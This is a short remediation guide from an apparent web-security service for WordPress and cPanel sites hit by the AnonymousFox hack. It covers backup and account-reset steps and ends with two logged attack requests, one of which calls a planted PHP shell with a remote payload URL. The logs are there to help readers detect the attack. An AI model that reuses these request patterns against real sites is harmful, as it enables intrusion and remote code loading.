If your hosting account is being affected AnonymousFox, don’t blame your web host. Probably you’re using WordPress and attackers gained access using vulnerable scripts.
Here’s what you should do.
Need help? Let us clean your site.
Step 1
Backup
- To prevent data loss, backup database using phpMyAdmin.
- Archive plugins, themes and uploads folders – place these in a safe area.
- Disable all your sites by moving files outside public area. Alternatively, you may rename “public_html” to “public_html_bk”.
Step 2
Investigate
Step 3
Plugins
Step 4
Database
Note: if any of these steps look like Japanese, probably you should hire someone to investigate and fix your website.
To address AnonymousFox hack, perform the following:
- Reset cPanel password.
- Removed unauthorized email accounts.
- Reset cPanel contact emails, checking “Contact Information” section.
- Make sure .contactemail file is right.
- Fix users entries, look for AnonymousFox and revert them.
- Perform a thorough malware cleanup for your website: https://guides.magefix.com/2021/03/fix-talkingaboutfirms-ga/
Need help? Try our Free security analysis.
Malicious requests:
167.99.49.25 – – [08/Dec/2021:19:57:48 +0100] “POST /wp-content/xydbtmlykd.php?php=anonymousfox.is/__@v6PnSVM/p2.txt HTTP/1.1” 200
167.99.49.25 – – [08/Dec/2021:19:57:34 +0100] “POST /wp-content/v1xn4.php?Fox=9ToZs HTTP/1.1” 200
